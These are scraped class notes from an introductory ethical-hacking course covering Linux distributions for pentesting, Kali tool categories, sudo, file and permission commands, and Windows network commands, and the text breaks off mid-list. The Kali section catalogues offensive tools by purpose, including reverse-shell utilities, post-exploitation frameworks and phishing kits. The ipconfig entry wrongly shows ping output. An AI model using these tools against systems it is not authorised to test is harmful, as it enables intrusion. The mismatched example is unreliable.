0% found this document useful (0 votes)
51 views

class revisions of EHP

Uploaded by

mdtasneem6397
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
51 views

class revisions of EHP

Uploaded by

mdtasneem6397
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 129

Byte Capsule EHP

Week 1

01. EHP Introduction

What will Learn from EHP Course


1. Hacking Basics
2. Scanning and Enumeration
3. Exploitation Basics with Practical
4. External Pentesting with practical
5. Exploit Development with practical
6. Active Directory Exploitation with practical
7. Web Application Exploitation with Practical
8. Wireless Network Exploitation with practical

02. EHP How to maintain classess

What to Do !! What Not to DO !!


1. Be Discipline
2. Make a routine
3. Don't discuss on Inappropriate topics
4. Be cooperative to others
5. Be Humble and Don't be over smart, Show your smartness on solving problemsl
6. Uninstall unnecessary applications from pc
7. Keep notes of classes using (Note book, google keep)

Week 2 OS Fundamentals

03. EHP Installation Guideline of Linux

Setup the lab in Desktop Or Laptop


1. Desktop or Laptop both can be used
2. Minimum 4gb Ram (For Basic Practice and Exploitation Development)
3. Recommending 8gb Ram, Core i3 or Ryzen 5 Processor 2 gb GPU
4. SSD 256gb Or HDD 1tb
5. To set up lab Parrot os / Kali linux / Windows 7 / Windows 10 is recommended
1/129
6. 6 Set up lab on Virtual Box / VMWare / Bootable Pendrive
7. To Set up Lab on Pendrive 16 gb is recommended

04. EHP Introduction to Linux

Linux distributions for ethical hacking and


penetration testing
Linux distributions, often referred to as Linux distros, are operating systems that come preloaded
with a wide range of ethical hacking and penetration testing tools. These distros are commonly used
by security researchers, penetration testers, and ethical hackers to conduct various security
assessments for organizations.

Whether you're aiming for a career in cybersecurity or simply want to explore the world of
penetration testing, there's a Linux distribution tailored to meet your needs.

1. Parrot Security OS
Parrot Security OS targets penetration testers and certified security personnel, but it also aims to
help those who need a privacy-focused distro such as journalists and ethical hackers.

What sets Parrot Security apart from other Linux distributions is that it offers an array of privacy
tools and encryption features.

It even offers a home edition that anyone can use to stay secure online. It also comes with a digital
forensics tab that was built in collaboration with the developers of CAINE.

Download Parrot Security OS

2. Kali Linux
Kali Linux is an excellent choice for those new to penetration testing, while also remaining a go-to
distro for seasoned professionals in ethical hacking. Built on the Debian operating system, Kali uses
the Xfce desktop environment and comes preloaded with a comprehensive set of penetration testing
tools.

Its flexibility makes it a favorite among experts, as it allows users to create custom Kali-based
distros tailored to specific needs. Kali Linux also benefits from a large community, offering extensive
documentation and user-generated tutorials to support both beginners and advanced users.

Download Kali Linux

3. BackBox Linux
BackBox Linux is an Ubuntu-based distribution designed for security assessments and penetration
testing. It includes a broad set of tools for web application and network analysis, making it a powerful
choice for security professionals.

BackBox is also beginner-friendly, with helpful tooltips and descriptions for each included tool, which
2/129
makes navigating its application menu easier, even for users who are new to penetration testing.
This user-friendly approach ensures that you can quickly find the tools you need to get started.

Download BackBox Linux

4. BlackArch Linux
BlackArch is a favorite among experienced security researchers and penetration testers due to its
vast collection of tools—over 2,000, in fact. While its user interface may not be the most beginner-
friendly, the well-organized repository makes it easy to navigate and find the tools you need.

BlackArch is regularly updated with new tools and improvements, maintaining its status as one of the
most comprehensive and popular Linux distros for ethical hacking and penetration testing. It's ideal
for professionals who need a robust toolkit for advanced security assessments.

Download BlackArch Linux

5. ArchStrike
ArchStrike (formerly known as ArchAssault) is a penetration testing and cybersecurity-focused
project built on Arch Linux. It combines the flexibility and power of Arch Linux with a comprehensive
set of tools specifically for security professionals and penetration testers.

ArchStrike includes thousands of tools and applications, organized into modular package groups,
allowing users to easily access the tools they need for various security tasks.

Whether you're conducting penetration tests, vulnerability assessments, or other cybersecurity


operations, ArchStrike provides a robust platform with the best of Arch Linux and an extensive toolkit
for the job.

Download ArchStrike

6. Fedora Security Spin


Fedora Security Spin is a specialized version of Fedora designed for security auditing, penetration
testing, and educational purposes.

This distribution is to support students and instructors as they practice and learn various security
methodologies, including information security, web application security, forensic analysis, and more.

With its focused toolset and robust support for security education, Fedora Security Spin provides an
ideal environment for both hands-on learning and professional security assessments.

Download Fedora Security Spin

7. Pentoo Linux
Pentoo is an excellent choice for users who are already familiar with Gentoo or are willing to invest
time in learning it. This distribution can be installed as an overlay on an existing Gentoo system or
run as a standalone OS.

However, Pentoo may not be ideal for beginners in penetration testing, as it comes with a steep

3/129
learning curve and a less structured organization that could be overwhelming for newcomers.
Additionally, it has limited documentation and support, which may pose a challenge for those new to
ethical hacking.

Despite these drawbacks, Pentoo remains popular among Gentoo enthusiasts and experienced
users who appreciate its flexibility and powerful toolset.

Download Pentoo Linux

8. Caine
Once you've gained some experience in penetration testing, CAINE (Computer-Aided Investigation
Environment) could be a valuable addition to your toolkit. Designed to simplify the process of
analyzing disks and drives, CAINE leverages automation to generate detailed reports, making it an
excellent resource for security teams.

Built on Ubuntu, CAINE is particularly well-suited for testing machine learning environments, which
are rapidly growing—currently expanding at a rate of 38% annually. Its focus on digital forensics and
automation makes it a strong choice for more advanced penetration testing and cybersecurity tasks.

Download Caine

9. Network security toolkit (NST)


NST (Network Security Toolkit) is a bootable live DVD/USB flash drive that provides a comprehensive
suite of free, open-source security and networking tools. It’s designed to help teams perform
everything from routine security diagnostics to more advanced penetration testing operations.

Built for use in virtual machines, NST is ideal for tasks like analysis, validation, and monitoring of
networks. Its "all-in-one" toolkit makes it popular among ethical hackers, professional penetration
testers, and even beginners, as it offers a wide range of tools to address various security needs in a
single, easy-to-use package.

Download Network Security Toolkit

10. Bugtraq
Bugtraq is a penetration testing distribution specifically designed for reverse engineering and
malware analysis. Based on Debian, this versatile distro is available for multiple operating systems
and provides excellent support for penetration testers.

Bugtraq comes preloaded with a variety of analysis tools, including mobile forensics, malware
testing, and other specialized features. All of these tools are developed and maintained by the
Bugtraq community, making it a valuable resource for those focused on security research, malware
analysis, and reverse engineering.

Download Bugtraq

11. DEFT linux


DEFT (Digital Evidence and Forensic Toolkit) is an open-source Linux distribution based on Ubuntu,
designed for digital forensics and incident response. It is built around the DART (Digital Advanced

4/129
Response Toolkit) software and comes preconfigured with a wide range of popular forensic tools and
resources.

DEFT is tailored for ethical hackers, penetration testers, IT security professionals, and others who
need to conduct digital investigations, analyze evidence, and respond to security incidents
effectively. With its comprehensive toolkit, DEFT is a valuable resource for anyone involved in digital
forensics and cybersecurity.

Download DEFT Linux

05. EHP Exploring Kali Linux

Exploring Kali Linux


The most advanced Penetration Testing Distribution. Kali Linux is an open-source, Debian-based
Linux distribution geared towards various information security tasks, such as Penetration Testing,
Security Research, Computer Forensics and Reverse Engineering.

The Kali Linux penetration testing platform contains a vast array of tools and utilities. From
information gathering to final reporting, Kali Linux enables security and IT professionals to assess
the security of their systems.

5/129
Find out all about Kali's Tools

Kali Linux comes with a wide range of pre-installed tools, categorized into different groups based on
their purpose. Here's a list of the main categories of tools in Kali Linux, which are commonly used for
penetration testing, ethical hacking, and cybersecurity assessments:

1. Information Gathering
Tools for gathering information about the target, such as network infrastructure, open ports, and
services.

• nmap – Network scanner and discovery tool


• whois – Domain and WHOIS information lookup
• theHarvester – Email and domain gathering
• dnsrecon – DNS enumeration tool
• nikto – Web server scanner

2. Vulnerability Analysis
Tools for identifying and analyzing vulnerabilities in systems, networks, or applications.

• OpenVAS – Vulnerability scanner


• Nessus – Commercial vulnerability scanner (trial version)
• Nikto – Web server scanner for vulnerabilities
• wpscan – WordPress vulnerability scanner
• Metasploit Framework – Exploit framework for penetration testing

3. Exploitation Tools
Tools to exploit discovered vulnerabilities in systems and networks.

Metasploit Framework – Exploit and payload creation framework


BeEF – Browser Exploitation Framework
Armitage – GUI front-end for Metasploit
Social Engineering Toolkit (SET) – Phishing, social engineering, and attack framework

4. Wireless Attacks
Tools for attacking and analyzing wireless networks.

Aircrack-ng – Wireless network crack tool (WEP/WPA)


Kismet – Wireless network detector and sniffer
Reaver – WPA/WPA2 attack tool (WPS PIN brute-force)
Wifite – Automated wireless network attack tool

5. Web Application Analysis


Tools for discovering vulnerabilities in web applications, such as SQL injection, cross-site scripting
(XSS), and more.

6/129
Burp Suite – Web application security testing framework
OWASP ZAP – Web application security scanner
dirbuster – Directory and file brute-forcing tool
sqlmap – Automated SQL injection and database takeover tool
w3af – Web application attack and audit framework

6. Password Attacks
Tools used for password cracking, brute forcing, and dictionary attacks.

John the Ripper – Password cracking tool


Hydra – Network logon cracker supporting various protocols
Hashcat – Advanced password cracking tool
Medusa – Parallel brute-force login cracking tool

7. Post Exploitation
Tools for maintaining control, gathering information, or escalating privileges after initial system
compromise.

meterpreter – Advanced payload for post-exploitation tasks (part of Metasploit)


Empire – PowerShell post-exploitation and agent-based framework
Cobalt Strike – Commercial post-exploitation and red-team framework

8. Forensics
Tools for digital forensics analysis, data recovery, and investigation.

Autopsy – Digital forensics platform


Sleuth Kit – Collection of command-line tools for digital forensics
Binwalk – Firmware analysis tool
Volatility – Memory forensics framework
Xplico – Network forensics analysis tool

9. Reverse Engineering
Tools for analyzing malware, unpacking binaries, and reverse engineering applications.

Ghidra – Software reverse engineering suite (developed by NSA)


Radare2 – Open-source framework for reverse engineering
IDA Pro – Commercial disassembler and debugger
OllyDbg – 32-bit assembler-level debugger
Frida – Dynamic instrumentation toolkit

10. Sniffing & Spoofing


Tools for intercepting and manipulating network traffic.

Wireshark – Network protocol analyzer


Ettercap – Man-in-the-middle attack tool

7/129
dsniff – Network sniffer for network traffic analysis
tcpdump – Command-line packet analyzer
mitmproxy – Interactive man-in-the-middle proxy for HTTP/S traffic

11. Social Engineering Tools


Tools designed for social engineering attacks and phishing.

Social Engineering Toolkit (SET) – Framework for social engineering attacks


FakeAP – Fake access point creation tool
Evilgrade – Exploiting software updates
PhishX – Phishing framework for testing email security

12. Maintaining Access


Tools for creating and maintaining persistent access to compromised systems.

netcat – Utility for creating reverse shells and connections


nc – Network connection tool (often used for reverse shells)
Persistence – Tools for maintaining access on target systems
Mettle – Metasploit’s multi-platform payload for maintaining access

13. Cloud Security


Tools for auditing and securing cloud environments.

CloudBrute – Brute-force tool for cloud services


Prowler – AWS security auditing tool
CLOUDWOLF – Cloud security monitoring tool

14. Reporting Tools


Tools that assist in generating reports from security assessments and penetration tests.

Dradis – Collaboration and reporting tool for pentesting


MagicTree – A tool for pentesting and reporting
Faraday – Collaborative penetration testing environment
KeepNote – Note-taking and organizing tool for security professionals

15. Miscellaneous Tools


A variety of additional tools for specialized tasks.

Netdiscover – Network discovery tool


Macchanger – MAC address changer
Proxychains – Force applications to use a proxy
Tshark – Command-line version of Wireshark

These are the main categories of tools found in Kali Linux. Kali includes many other tools beyond

8/129
these categories, each serving different aspects of penetration testing, cybersecurity, and digital
forensics. Kali Linux offers a comprehensive suite that makes it one of the go-to distributions for
ethical hackers, penetration testers, and security professionals.

06. EHP Sudo Overview

Overview of sudo
sudo (short for "SuperUser Do") is a command-line utility used in Unix-like operating systems (such
as Linux and macOS) to allow a permitted user to execute a command as the superuser (root) or
another user, as specified by security policy. It provides a mechanism for delegated administrative
control and helps protect systems by limiting direct access to root privileges.

Key Features of sudo:


1. Execute Commands as Root or Another User:

The most common use of sudo is to execute commands with superuser (root) privileges. This is
essential for performing administrative tasks like installing software, modifying system files, or
managing system services.

Example:

sudo apt-get update # Update package lists on a Debian-based system


sudo systemctl restart apache2 # Restart a service (e.g., Apache)

2. Controlled Access:

sudo provides granular control over who can execute what commands, and under what conditions.
This is managed through the /etc/sudoers file, which is edited using visudo to ensure syntax integrity.
Only users who are listed in this file (or in group memberships) can run commands with elevated
privileges.

3. Logging:

Every command run through sudo is logged, which helps in auditing and tracking who did what on
the system. These logs can be found in /var/log/auth.log or /var/log/sudo depending on the system
configuration.

4. Timeout:

After a user enters their password to execute a command with sudo, a timestamp is set. For a
configurable time period (usually 15 minutes), they won’t need to enter the password again for
additional sudo commands.

5. Security and Best Practices:

• By using sudo, users are not granted full access to the root account, but instead can run specific
commands as root. This minimizes the risk of accidental system-wide damage and protects against
malicious activities that could result from using a root shell directly.

9/129
• sudo reduces the chances of mistakes made while logged in as root, especially since the root
account can be disabled in some systems for extra security.

Basic Syntax:

sudo [OPTION] COMMAND [ARGUMENTS...]

• OPTION: Flags or options for modifying the behavior of sudo.


• COMMAND: The command to run with elevated privileges.
• ARGUMENTS: Any arguments the command requires.

Common sudo Commands and Options:

1. Running a Command as Another User:


sudo -u username command_to_run

Example:
sudo -u john ls /home/john # Run the `ls` command as user 'john'

2. No Password Prompt (Dangerous - Use with Caution): You can configure sudo to not ask for a
password when running commands. This is done by modifying the /etc/sudoers file, but should be
used cautiously.

username ALL=(ALL) NOPASSWD: ALL

3. Editing Files as Root: Using sudo to open an editor (e.g., vi, nano) with root privileges to modify
system files:

sudo nano /etc/hosts # Edit the hosts file as root

4. Checking the User's Privileges: You can check which commands a user is allowed to run via sudo
by using:

sudo -l

5. View the Sudoers File (use visudo for safety):

sudo visudo

6. Revoke sudo Access: If you need to revoke a user's sudo privileges, you would remove them from
the relevant sudoers group or file.

Security Considerations:
• Least Privilege Principle: Always assign only the minimum necessary privileges to users.

• Passwordless sudo: Disabling the password prompt can be risky, so it's advisable to limit this
practice unless there’s a specific use case.

• Sudoers File Management: Mistakes in the /etc/sudoers file can lock you out of administrative
privileges. Always use visudo, which checks for syntax errors before saving.

Example Use Cases:

10/129
1. System Update:
sudo apt update && sudo apt upgrade # Update packages on a Debian-based system

2. Add a User:
sudo useradd -m newuser # Create a new user

3. Restart a Service:
sudo systemctl restart apache2 # Restart the Apache service

4. Access Files and Directories:


sudo chmod 777 /path/to/file # Change file permissions
sudo chown root:root /path/to/file # Change file ownership

Conclusion:
sudo is an essential tool in Unix-like systems for safely managing administrative tasks without the
need to switch to the root account. It offers an extra layer of security, flexibility, and accountability
by allowing users to execute commands as root or another user with specific permissions.

07. EHP Navigating the file system

Navigating the file system


Navigating the Linux file system involves moving through directories, viewing files, and managing
file system structures using commands in the terminal. The file system is organized hierarchically,
with the root directory (/) at the top, and all files and directories are organized beneath it.

Key Concepts:

• pwd: Shows the current working directory.


• ls: Lists the contents of a directory.
• cd: Changes the current directory.
• ~: Represents the home directory of the current user.
• / (Root): The root directory, which is the starting point of the file system.
• File paths: Can be absolute (starting from /) or relative (from the current directory).

Common Commands:

• cd /path/to/directory: Change to a specific directory.


• ls: List files and directories.
• pwd: Print the current directory path.
• mkdir: Create a new directory.
• rm: Delete files.
• cp: Copy files or directories.
• mv: Move or rename files.

Understanding these commands allows to explore, manage, manipulate files and directories on a
Linux system efficiently.

Here’s examples for Navigating the Linux file system:

11/129
1. pwd (Print Working Directory)
Purpose: Tells you where you are in the file system.

Usage:
>> pwd

2. ls (List)
Purpose: Lists the contents of the current directory.

Usage:
>> ls

3. cd (Change Directory)
Purpose: Move between directories.

Usage:
>> cd /path/to/directory

4. cd ~ (Home Directory)
Purpose: Quickly go to your home directory.

Usage:
>> cd ~

5. cd .. (Parent Directory)
Purpose: Go one level up in the directory tree.

Usage:
>> cd ..

6. ls -l (Long Listing)
Purpose: Lists files with detailed information (permissions, owner, size, date).

Usage:
>> ls -l

7. ls -a (Show Hidden Files)


Purpose: Show files that begin with a dot (hidden files).

Usage:
>> ls -a

8. mkdir (Make Directory)


Purpose: Create a new directory.

Usage:
>> mkdir new_directory

9. rmdir (Remove Directory)


Purpose: Remove an empty directory.

Usage:
>> rmdir directory_name

12/129
10. rm (Remove File)
Purpose: Delete a file.

Usage:
>> rm file_name

11. find (Search for Files)


Purpose: Find files by name or other attributes.

Usage:
>> find /path/to/search -name "filename"

12. locate (Quick File Search)


Purpose: Quickly search for files based on a database.

Usage:
>> locate filename

13. cp (Copy Files/Directories)


Purpose: Copy files or directories from one place to another.

Usage:
>> cp source_file destination

For directories, use -r to copy recursively:

>> cp -r source_directory destination

14. mv (Move/Rename Files/Directories)


Purpose: Move or rename files and directories.

Usage:
>> mv old_name new_name # Rename a file
>> mv file_name /new/path # Move a file

15. cat (Concatenate and View Files)


Purpose: Display the contents of a file.

Usage:
>> cat filename

16. more (View Files Page-by-Page)


Purpose: View long files one page at a time.

Usage:
>> more filename

17. less (View Files with Navigation)


Purpose: Similar to more, but allows scrolling up and down.

Usage:
>> less filename

13/129
18. head (View the Start of a File)
Purpose: Display the first few lines of a file (default: 10).

Usage:
>> head filename

19. tail (View the End of a File)


Purpose: Display the last few lines of a file (default: 10).

Usage:
>> tail filename

20. df (Disk Free)


Purpose: Display available disk space on file systems.

Usage:
>> df -h

21. du (Disk Usage)


Purpose: Show the disk usage of files and directories.

Usage:
>> du -sh directory_name

22. tree (Display Directory Tree)


Purpose: Show directories and files in a tree-like structure.

Usage:
>> tree

23. stat (Display File or File System Status)


Purpose: Shows detailed information about a file or file system, including access times, permissions,
and disk block usage.

Usage:
>> stat filename

24. File (Determine File Type)


Purpose: Tells you the type of a file (e.g., whether it’s a regular file, directory, symbolic link, or
something else).

Usage:
>> file filename

25. touch (Create Empty Files or Update Timestamps)


Purpose: Create a new, empty file or update the timestamp of an existing file (i.e., access and
modification times).

Usage:
>> touch new_file

26. basename (Strip Directory and Suffix from Filename)

14/129
Purpose: Extract the file name from a path, or remove a file extension (suffix).

Usage:
>> basename /path/to/file.txt # Outputs: file.txt
>> basename /path/to/file.txt .txt # Outputs: file

27. dirname (Extract Directory Path)


Purpose: Get the directory portion of a file path, effectively removing the filename.

Usage:
>> dirname /path/to/file.txt # Outputs: /path/to

28. which (Find the Location of Executable Files)


Purpose: Shows the full path of a command or program in the directories listed in the system’s
$PATH.

Usage:
>> which command_name

29. whereis (Locate Binary, Source, and Manual Pages)


Purpose: Find the binary, source, and manual pages for a command.

Usage:
>> whereis command_name

30. history (Show Command History)


Purpose: Displays a list of previously executed commands. You can use this to re-run commands
easily.

Usage:
>> history

31. !<number> (Execute Command from History)


Purpose: Re-run a command from your history list using its number.

Usage:
>> !15 # Run the command listed as number 15 in your history

32. alias (Create Command Aliases)


Purpose: Create shortcuts or custom commands. You can alias long commands to make them easier
to run.

Usage:
>> alias ll='ls -l' # Create an alias for 'ls -l' to be run as 'll'

33. unalias (Remove Command Aliases)


Purpose: Remove previously created aliases.

Usage:
>> unalias ll # Removes the 'll' alias

34. mount (Mount Filesystems)


Purpose: Mount file systems (e.g., external drives, network shares).

15/129
Usage:
>> sudo mount /dev/sdb1 /mnt/mydrive # Mount a drive to a specific directory

35. umount (Unmount Filesystems)


Purpose: Unmount file systems (e.g., external drives).

Usage:
>> sudo umount /mnt/mydrive

36. chattr (Change File Attributes)


Purpose: Set or unset special attributes on files or directories, such as making a file immutable.

Usage:
>> sudo chattr +i filename # Make a file immutable (cannot be modified, deleted, etc.)
>> sudo chattr -i filename # Remove the immutable flag

37. fuser (Identify Processes Using a File or Directory)


Purpose: Identify processes that are using a specific file or directory.

Usage:
>> fuser filename # Displays the process ID(s) using the file
>> fuser -k filename # Kill processes using the file

38. mount -o loop (Mount ISO Images)


Purpose: Mount ISO files (e.g., CD/DVD images) to a directory.

Usage:
>> sudo mount -o loop /path/to/file.iso /mnt/iso

39. lsblk (List Block Devices)


Purpose: List information about all available or the specified block devices (e.g., hard drives, SSDs,
USB drives).

Usage:
>> lsblk

40. blkid (Display Block Device Information)


Purpose: Show detailed information about block devices, including UUIDs and filesystem types.

Usage:
>> blkid

41. rsync (Remote Sync and File Transfer)


Purpose: Sync files or directories between locations, either locally or over a network. It’s efficient
because it only transfers changes.

Usage:
>> rsync -av source_directory/ destination_directory/
>> rsync -avz source_directory/ user@remote_host:/path/to/destination/

42. tar (Archive and Extract Files)


Purpose: Create and extract compressed archive files (tarballs).

16/129
Usage:
>> tar -cvf archive.tar directory_name # Create a tarball (archive)
>> tar -xvf archive.tar # Extract a tarball
>> tar -czvf archive.tar.gz directory_name # Create a compressed tarball
>> tar -xzvf archive.tar.gz # Extract a compressed tarball

43. gzip/gunzip (Compress/Decompress Files)


Purpose: Compress and decompress files using the gzip format.

Usage:
>> gzip filename # Compress file
>> gunzip filename.gz # Decompress file

44. bzip2/bunzip2 (Compress/Decompress Files with bzip2)


Purpose: Compress and decompress files using the bzip2 format (higher compression ratio than
gzip).

Usage:
>> bzip2 filename # Compress file
>> bunzip2 filename.bz2 # Decompress file

45. zip/unzip (Zip and Unzip Files)


Purpose: Create or extract zip archives.

Usage:
>> zip archive.zip file1 file2 # Create a zip archive
>> unzip archive.zip # Extract a zip archive

46. mount -t (Specify Filesystem Type)


Purpose: Mount a device or partition with a specified filesystem type.

Usage:
>> sudo mount -t ext4 /dev/sdb1 /mnt/mydrive # Mount with a specific filesystem type (ext4 in this
case)

47. lsmod (List Loaded Kernel Modules)


Purpose: Shows all loaded kernel modules. This is useful for understanding which drivers or modules
are active.

Usage:
>> lsmod

48. dmesg (Display Kernel Ring Buffer)


Purpose: Displays messages from the kernel (useful for troubleshooting hardware issues).

Usage:
>> dmesg

49. lsof (List Open Files)


Purpose: List all open files and the corresponding processes that opened them. This is helpful for
finding out which processes are using a file.

17/129
Usage:
>> lsof filename

50. mount | grep (Filter Mounted Filesystems)


Purpose: Display all mounted file systems, or filter results for a specific one.

Usage:
>> mount | grep /mnt

51. df -i (Display Inode Usage)


Purpose: Show inode usage on mounted filesystems. This is useful when you run out of inodes, not
just disk space.

Usage:
>> df -i

Conclusion
With these commands, you have a comprehensive toolkit to navigate and manage the Linux file
system effectively. These commands cover everything from basic navigation to advanced system
administration tasks. Keep this reference handy for when you need to perform routine tasks or
troubleshoot issues!

08. EHP Users and Privileges

Users and Privileges


1. What is a User in Linux?

In Linux, a user is anyone or anything that interacts with the system. A user could be a person, a
service, or a process. Each user has a unique identity and access level.

2. Types of Users

Root User (Superuser):

• The root user has unlimited privileges to do anything on the system (e.g., install software, change
configurations, manage files).

• The root user has ID 0 (UID=0).

• Be cautious: Root has the power to break things easily if used incorrectly.

Regular Users:

• Regular users have restricted access compared to the root user. They can access only their files
and directories, and any system-wide actions require elevated permissions (e.g., via sudo).

System Users:

• These users are created by the system for specific services or applications (e.g., www-data for web
services). These users don’t log in but are used by processes.
18/129
3. Understanding User Accounts
User Name (Login Name):
This is the name you use to log in, e.g., john, alice, or admin.

User ID (UID):
Every user has a User ID (UID), which is a unique number associated with the user. For example:

• UID 0 is reserved for the root user.


• Regular users typically start from UID 1000.

Group Name:

• Each user is also associated with a primary group. This is a collection of users that share common
permissions.

Home Directory:

• This is where a user's personal files are stored. It’s usually located at /home/<username>, e.g., /
home/john.

Shell:

• The shell is the command-line interface that the user interacts with (e.g., bash, zsh).

4. Managing Users

Creating a New User


>> sudo useradd <username>

This creates a new user but does not set a password.

Setting a Password
>> sudo passwd <username>

Deleting a User
>> sudo userdel <username>

Deletes the user account. Use sudo userdel -r <username> to remove the user's home directory as
well.

5. Groups in Linux
Groups allow you to manage permissions for multiple users easily. A group is a collection of users
that share common access rights to files, directories, and resources.

Creating a New Group


>> sudo groupadd <groupname>

Adding a User to a Group


>> sudo usermod -aG <groupname> <username>

This adds an existing user to an existing group.

19/129
Listing Groups a User Belongs To
>> groups <username>

6. Privileges and Permissions


In Linux, file access is controlled by file permissions, which specify who can read, write, or execute a
file. File permissions are represented by a combination of symbols (r, w, x) or numeric values (octal
notation).

Symbolic Representation:

r = read
w = write
x = execute
Example: -rwxr-xr-- indicates:

Permissions Overview
• r (read): Allows the user to view the contents of a file.
• w (write): Allows the user to modify or delete the file.
• x (execute): Allows the user to run the file as a program.

Each file or directory has three permission sets:

1. Owner (User who created the file) (Owner has read, write, and execute permissions.)
2. Group (Users in the file’s group) (Group has read and execute permissions.)
3. Others (Everyone else) (Others have only read permissions.)

Numeric (Octal) Representation:

r=4
w=2
x=1
Example: 755 means:

Owner: 7 (rwx) = 4+2+1


Group: 5 (r-x) = 4+0+1
Others: 5 (r-x) = 4+0+1

Changing Permissions:

chmod 755 file: Sets permissions to rwxr-xr-x.

Changing Ownership:

chown owner:group file: Changes the owner and group of a file.


Example: chown user1:user1 file.txt

Checking Permissions
Use ls -l to view permissions:
>> ls -l <filename>

20/129
Example output:
-rwxr-xr-- 1 john john 1234 Nov 24 12:00 example.txt

• The first character (-) indicates it's a file (a 'd' would indicate a directory).
• rwx = Owner has read, write, and execute permissions.
• r-x = Group has read and execute permissions.
• r-- = Others have only read permissions.

Changing Permissions (chmod)


chmod command allows you to change file permissions.

Usage:
>> chmod +x file_name # Add execute permission
chmod 755 file_name # Set specific permissions

Numeric Mode: Each permission has a number:

r = 4, w = 2, x = 1
Combine them: 7 = rwx, 6 = rw-, 5 = r-x, 4 = r--, etc.

Example:
>> chmod 755 <filename> # rwxr-xr-x

Symbolic Mode: You can also modify permissions using letters:

>> chmod u+x <filename> # Add execute permission for the user (owner)
>> chmod g-w <filename> # Remove write permission from the group
>> chmod o=r <filename> # Set read-only permission for others

Changing File Ownership (chown)

Use chown to change the owner and group of a file.


>> sudo chown <user>:<group> <filename>

Example: sudo chown john:admin example.txt changes the owner to john and the group to admin.

7. Special Permissions

SUID (Set User ID):

Allows a program to run with the privileges of the file’s owner (usually root).
Indicated by an s in the execute position for the owner:

>> chmod u+s <filename>

SGID (Set Group ID):

Similar to SUID, but the program runs with the group privileges.
Indicated by an s in the execute position for the group:

>> chmod g+s <filename>

Sticky Bit:
21/129
Restricts file deletion in a shared directory to the file owner, not anyone with write permission.
Indicated by a t in the execute position for others:

>> chmod +t <directory>

8. Using sudo for Privilege Escalation

sudo allows regular users to execute commands with elevated (root) privileges.

Example:
>> sudo apt-get update # Run as root

You will be prompted for your password, and you can only run sudo commands if your user is in the
sudoers group.

Adding a User to the sudo Group


>> sudo usermod -aG sudo <username>

9. Conclusion: A Quick Recap

• Users: Root (superuser), regular users, and system users.


• Groups: Groups help manage permissions for multiple users.
• Permissions: Read (r), Write (w), Execute (x). Use chmod, chown to manage them.
• Special Permissions: SUID, SGID, Sticky bit for advanced control.
• sudo: Grants temporary root privileges for trusted users.

By keeping these basic principles in mind, you can manage users and privileges effectively on any
Linux system, whether you're a beginner or an advanced user.

09. EHP Common Network Commands

Common Network Commands


https://github.com/cambridgeitcollege/CMD-Commands

22/129
23/129
1. Command: ipconfig (for windows)

Description: Displays the current network configuration details, such as IP address, subnet mask, and
default gateway of network adapters.

Example:
$ ping google.com

Output:
Pinging google.com [142.250.72.238] with 32 bytes of data:
Reply from 142.250.72.238: bytes=32 time=12ms TTL=116
Reply from 142.250.72.238: bytes=32 time=10ms TTL=116
Reply from 142.250.72.238: bytes=32 time=13ms TTL=116

2. Command: tracert

Description: Traces the route taken by packets to a destination host, showing the intermediate
routers.

Example:

24/129
$ tracert google.com

Output:
Tracing route to google.com [142.250.72.238]
over a maximum of 30 hops:

1 <1 ms <1 ms <1 ms 192.168.1.1


2 7 ms 6 ms 7 ms isp-gateway.example.com [203.0.113.1]
3 12 ms 13 ms 11 ms 142.250.72.238

3. Command: netstat

Description: Displays active network connections, listening ports, and associated network statistics.

Example:
$ netstat

Output:
Active Connections

Proto Local Address Foreign Address State


TCP 192.168.1.10:49238 example.com:80 ESTABLISHED
TCP 192.168.1.10:49239 example.com:443 TIME_WAIT

4. Command: nslookup

Description: Resolves domain names to IP addresses or vice versa.

Example:
$ nslookup google.com

Output:
Server: dns.google
Address: 8.8.8.8

Non-authoritative answer:
Name: google.com
Address: 142.250.72.238

5. Command: hostname

Description: Displays or sets the computer's hostname.

Example:
$ hostname

Output:
my-computer

6. Command: arp

Description: Displays and modifies the ARP (Address Resolution Protocol) table, showing the mapping

25/129
between IP addresses and MAC addresses.

Example:
$ arp -a

Output:
Interface: 192.168.1.10 --- 0x12
Internet Address Physical Address Type
192.168.1.1 00-14-22-01-23-45 Dynamic

7. Command: route

Description: Displays or modifies the system's routing table.

Example:
$ route print

Output:
IPv4 Route Table
==============================================================
=====
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.10 25

8. Command: telnet

Description: Connects to a remote host using the Telnet protocol.

Example:
$ telnet example.com 23

Output:
Trying 203.0.113.1...
Connected to example.com.
Escape character is '^]'.
Welcome to the Telnet server!

9. Command: ftp

Description: Transfers files to/from remote FTP servers.

Example:
$ ftp example.com

Output:
Connected to example.com.
220 Welcome to the FTP server.
Name (example.com:user):

10. Command: net

26/129
Description: Manages network resources, such as shares, sessions, and users.

Example:
$ net view

Output:
Server Name Remark
-----------------------------------------
\\SERVER1 File Server
\\SERVER2 Database Server
The command completed successfully.

11. Command: netsh

Description: A powerful command-line utility for managing network configurations, including IP


settings, firewall, and routing.

Example:
$ netsh interface ip show config

Output:
Configuration for interface "Ethernet"
DHCP enabled: Yes
IP Address: 192.168.1.10
Subnet Mask: 255.255.255.0
Default Gateway: 192.168.1.1

12. Command: net use

Description: Connects to or disconnects from shared network resources.

Example:
$ net use Z: \\SERVER1\shared_folder

Output:
The command completed successfully.

13. Command: net view

Description: Displays a list of computers or shared resources on a network.

Example:
$ net view \\SERVER1

Output:
Shared resources at \\SERVER1
Resource Type Comment
-----------------------------------------
shared_folder Disk Shared Documents
The command completed successfully.

14. Command: net share

27/129
Description: Creates, deletes, or manages shared folders on the local computer.

Example:
$ net share shared_docs=C:\Shared

Output:
shared_docs was shared successfully.

15. Command: net session

Description: Displays and manages active network sessions with the local computer.

Example:
$ net session

Output:
Computer User name Client Type Opens Idle time
192.168.1.15 admin Windows 2 00:15:30
The command completed successfully.

16. Command: net time

Description: Synchronizes the local computer's clock with a network time server.

Example:
$ net time \\SERVER1 /set /yes

Output:
The current time at \\SERVER1 is 11/26/2024 10:15:42 AM.
The command completed successfully.

17. Command: netdom

Description: A domain management tool for joining computers to a domain, resetting passwords,
and more.

Example:
